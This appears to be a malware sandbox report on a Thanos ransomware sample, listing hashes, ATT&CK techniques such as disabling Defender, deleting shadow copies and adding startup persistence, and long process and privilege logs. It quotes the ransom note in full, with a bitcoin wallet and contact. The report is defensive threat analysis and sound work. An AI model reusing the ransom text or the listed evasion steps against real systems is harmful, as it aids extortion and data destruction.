6a5090762c6058bc223e37e89f53832faad80995e3c5ed7e59ed9f5a5e604e47

Resubmissions

04-11-2021 14:41

211104-r2dv8agha4 10

27-01-2021 22:14

210127-cr6bjqfx2e 10

Analysis

max time kernel
82s
max time network
144s
platform
windows10_x64
resource
win10v20201028
submitted
27-01-2021 22:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

thanos-cleaned.exe
Size

92KB
MD5

fe7dcc0f74e152a78963d560b2e3d148
SHA1

f9cf1dd1a7e8b2dffc9e0195685cef5a625832ea
SHA256

6a5090762c6058bc223e37e89f53832faad80995e3c5ed7e59ed9f5a5e604e47
SHA512

a1d2de8abf7e56a2c29bfa38d0ae23584db2174ec8b14c6da3220e1c52ad52861714f8c363be843d16cdf13a22e0b74c16a1cb684ba102f132b09133338a169a

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 3 IoCs

flow	pid	Process
35	7096	mshta.exe
37	7096	mshta.exe
39	7096	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
5864	2kx1y5bm.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\OptimizePush.png.crypted	thanos-cleaned.exe
File created	C:\Users\Admin\Pictures\CloseComplete.raw.crypted	thanos-cleaned.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	thanos-cleaned.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	thanos-cleaned.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	thanos-cleaned.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
6264	vssadmin.exe
6240	vssadmin.exe
6312	vssadmin.exe
6296	vssadmin.exe
6272	vssadmin.exe
6256	vssadmin.exe
6304	vssadmin.exe
6320	vssadmin.exe
6288	vssadmin.exe
6280	vssadmin.exe
6248	vssadmin.exe
6232	vssadmin.exe
6220	vssadmin.exe
6328	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
6208	taskkill.exe
6200	taskkill.exe
6192	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5484	PING.EXE

Suspicious behavior: EnumeratesProcesses 639 IoCs

pid	Process
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
1196	powershell.exe
756	thanos-cleaned.exe
1196	powershell.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
1196	powershell.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
796	powershell.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
796	powershell.exe
796	powershell.exe
2136	powershell.exe
2136	powershell.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
2296	powershell.exe
2296	powershell.exe
796	powershell.exe
3980	powershell.exe
3980	powershell.exe
3980	powershell.exe
820	powershell.exe
820	powershell.exe
2136	powershell.exe
820	powershell.exe
3104	powershell.exe
3104	powershell.exe
2296	powershell.exe
3980	powershell.exe
1056	powershell.exe
1056	powershell.exe
4168	powershell.exe
4168	powershell.exe
2136	powershell.exe
820	powershell.exe
4348	powershell.exe
4348	powershell.exe
2296	powershell.exe
3104	powershell.exe
1056	powershell.exe
4168	powershell.exe
4348	powershell.exe
3104	powershell.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
1056	powershell.exe
756	thanos-cleaned.exe
4168	powershell.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
4348	powershell.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
4992	powershell.exe
4992	powershell.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
5044	powershell.exe
5044	powershell.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
5104	powershell.exe
5104	powershell.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
4992	powershell.exe
4992	powershell.exe
5044	powershell.exe
5044	powershell.exe
4992	powershell.exe
5104	powershell.exe
5104	powershell.exe
5044	powershell.exe
5104	powershell.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe
756	thanos-cleaned.exe

Suspicious use of AdjustPrivilegeToken 296 IoCs

description	pid	Process
Token: SeDebugPrivilege	756	thanos-cleaned.exe
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeIncreaseQuotaPrivilege	1196	net.exe
Token: SeSecurityPrivilege	1196	net.exe
Token: SeTakeOwnershipPrivilege	1196	net.exe
Token: SeLoadDriverPrivilege	1196	net.exe
Token: SeSystemProfilePrivilege	1196	net.exe
Token: SeSystemtimePrivilege	1196	net.exe
Token: SeProfSingleProcessPrivilege	1196	net.exe
Token: SeIncBasePriorityPrivilege	1196	net.exe
Token: SeCreatePagefilePrivilege	1196	net.exe
Token: SeBackupPrivilege	1196	net.exe
Token: SeRestorePrivilege	1196	net.exe
Token: SeShutdownPrivilege	1196	net.exe
Token: SeDebugPrivilege	1196	net.exe
Token: SeSystemEnvironmentPrivilege	1196	net.exe
Token: SeRemoteShutdownPrivilege	1196	net.exe
Token: SeUndockPrivilege	1196	net.exe
Token: SeManageVolumePrivilege	1196	net.exe
Token: 33	1196	net.exe
Token: 34	1196	net.exe
Token: 35	1196	net.exe
Token: 36	1196	net.exe
Token: SeDebugPrivilege	796	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	820	powershell.exe
Token: SeDebugPrivilege	3104	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeIncreaseQuotaPrivilege	796	powershell.exe
Token: SeSecurityPrivilege	796	powershell.exe
Token: SeTakeOwnershipPrivilege	796	powershell.exe
Token: SeLoadDriverPrivilege	796	powershell.exe
Token: SeSystemProfilePrivilege	796	powershell.exe
Token: SeSystemtimePrivilege	796	powershell.exe
Token: SeProfSingleProcessPrivilege	796	powershell.exe
Token: SeIncBasePriorityPrivilege	796	powershell.exe
Token: SeCreatePagefilePrivilege	796	powershell.exe
Token: SeBackupPrivilege	796	powershell.exe
Token: SeRestorePrivilege	796	powershell.exe
Token: SeShutdownPrivilege	796	powershell.exe
Token: SeDebugPrivilege	796	powershell.exe
Token: SeSystemEnvironmentPrivilege	796	powershell.exe
Token: SeRemoteShutdownPrivilege	796	powershell.exe
Token: SeUndockPrivilege	796	powershell.exe
Token: SeManageVolumePrivilege	796	powershell.exe
Token: 33	796	powershell.exe
Token: 34	796	powershell.exe
Token: 35	796	powershell.exe
Token: 36	796	powershell.exe
Token: SeIncreaseQuotaPrivilege	3980	powershell.exe
Token: SeSecurityPrivilege	3980	powershell.exe
Token: SeTakeOwnershipPrivilege	3980	powershell.exe
Token: SeLoadDriverPrivilege	3980	powershell.exe
Token: SeSystemProfilePrivilege	3980	powershell.exe
Token: SeSystemtimePrivilege	3980	powershell.exe
Token: SeProfSingleProcessPrivilege	3980	powershell.exe
Token: SeIncBasePriorityPrivilege	3980	powershell.exe
Token: SeCreatePagefilePrivilege	3980	powershell.exe
Token: SeBackupPrivilege	3980	powershell.exe
Token: SeRestorePrivilege	3980	powershell.exe
Token: SeShutdownPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeSystemEnvironmentPrivilege	3980	powershell.exe
Token: SeRemoteShutdownPrivilege	3980	powershell.exe
Token: SeUndockPrivilege	3980	powershell.exe
Token: SeManageVolumePrivilege	3980	powershell.exe
Token: 33	3980	powershell.exe
Token: 34	3980	powershell.exe
Token: 35	3980	powershell.exe
Token: 36	3980	powershell.exe
Token: SeIncreaseQuotaPrivilege	820	powershell.exe
Token: SeSecurityPrivilege	820	powershell.exe
Token: SeTakeOwnershipPrivilege	820	powershell.exe
Token: SeLoadDriverPrivilege	820	powershell.exe
Token: SeSystemProfilePrivilege	820	powershell.exe
Token: SeSystemtimePrivilege	820	powershell.exe
Token: SeProfSingleProcessPrivilege	820	powershell.exe
Token: SeIncBasePriorityPrivilege	820	powershell.exe
Token: SeCreatePagefilePrivilege	820	powershell.exe
Token: SeBackupPrivilege	820	powershell.exe
Token: SeRestorePrivilege	820	powershell.exe
Token: SeShutdownPrivilege	820	powershell.exe
Token: SeDebugPrivilege	820	powershell.exe
Token: SeSystemEnvironmentPrivilege	820	powershell.exe
Token: SeRemoteShutdownPrivilege	820	powershell.exe
Token: SeUndockPrivilege	820	powershell.exe
Token: SeManageVolumePrivilege	820	powershell.exe
Token: 33	820	powershell.exe
Token: 34	820	powershell.exe
Token: 35	820	powershell.exe
Token: 36	820	powershell.exe
Token: SeIncreaseQuotaPrivilege	2136	powershell.exe
Token: SeSecurityPrivilege	2136	powershell.exe
Token: SeTakeOwnershipPrivilege	2136	powershell.exe
Token: SeLoadDriverPrivilege	2136	powershell.exe
Token: SeSystemProfilePrivilege	2136	powershell.exe
Token: SeSystemtimePrivilege	2136	powershell.exe
Token: SeProfSingleProcessPrivilege	2136	powershell.exe
Token: SeIncBasePriorityPrivilege	2136	powershell.exe
Token: SeCreatePagefilePrivilege	2136	powershell.exe
Token: SeBackupPrivilege	2136	powershell.exe
Token: SeRestorePrivilege	2136	powershell.exe
Token: SeShutdownPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeSystemEnvironmentPrivilege	2136	powershell.exe
Token: SeRemoteShutdownPrivilege	2136	powershell.exe
Token: SeUndockPrivilege	2136	powershell.exe
Token: SeManageVolumePrivilege	2136	powershell.exe
Token: 33	2136	powershell.exe
Token: 34	2136	powershell.exe
Token: 35	2136	powershell.exe
Token: 36	2136	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeIncreaseQuotaPrivilege	2296	powershell.exe
Token: SeSecurityPrivilege	2296	powershell.exe
Token: SeTakeOwnershipPrivilege	2296	powershell.exe
Token: SeLoadDriverPrivilege	2296	powershell.exe
Token: SeSystemProfilePrivilege	2296	powershell.exe
Token: SeSystemtimePrivilege	2296	powershell.exe
Token: SeProfSingleProcessPrivilege	2296	powershell.exe
Token: SeIncBasePriorityPrivilege	2296	powershell.exe
Token: SeCreatePagefilePrivilege	2296	powershell.exe
Token: SeBackupPrivilege	2296	powershell.exe
Token: SeRestorePrivilege	2296	powershell.exe
Token: SeShutdownPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeSystemEnvironmentPrivilege	2296	powershell.exe
Token: SeRemoteShutdownPrivilege	2296	powershell.exe
Token: SeUndockPrivilege	2296	powershell.exe
Token: SeManageVolumePrivilege	2296	powershell.exe
Token: 33	2296	powershell.exe
Token: 34	2296	powershell.exe
Token: 35	2296	powershell.exe
Token: 36	2296	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeIncreaseQuotaPrivilege	1056	powershell.exe
Token: SeSecurityPrivilege	1056	powershell.exe
Token: SeTakeOwnershipPrivilege	1056	powershell.exe
Token: SeLoadDriverPrivilege	1056	powershell.exe
Token: SeSystemProfilePrivilege	1056	powershell.exe
Token: SeSystemtimePrivilege	1056	powershell.exe
Token: SeProfSingleProcessPrivilege	1056	powershell.exe
Token: SeIncBasePriorityPrivilege	1056	powershell.exe
Token: SeCreatePagefilePrivilege	1056	powershell.exe
Token: SeBackupPrivilege	1056	powershell.exe
Token: SeRestorePrivilege	1056	powershell.exe
Token: SeShutdownPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeSystemEnvironmentPrivilege	1056	powershell.exe
Token: SeRemoteShutdownPrivilege	1056	powershell.exe
Token: SeUndockPrivilege	1056	powershell.exe
Token: SeManageVolumePrivilege	1056	powershell.exe
Token: 33	1056	powershell.exe
Token: 34	1056	powershell.exe
Token: 35	1056	powershell.exe
Token: 36	1056	powershell.exe
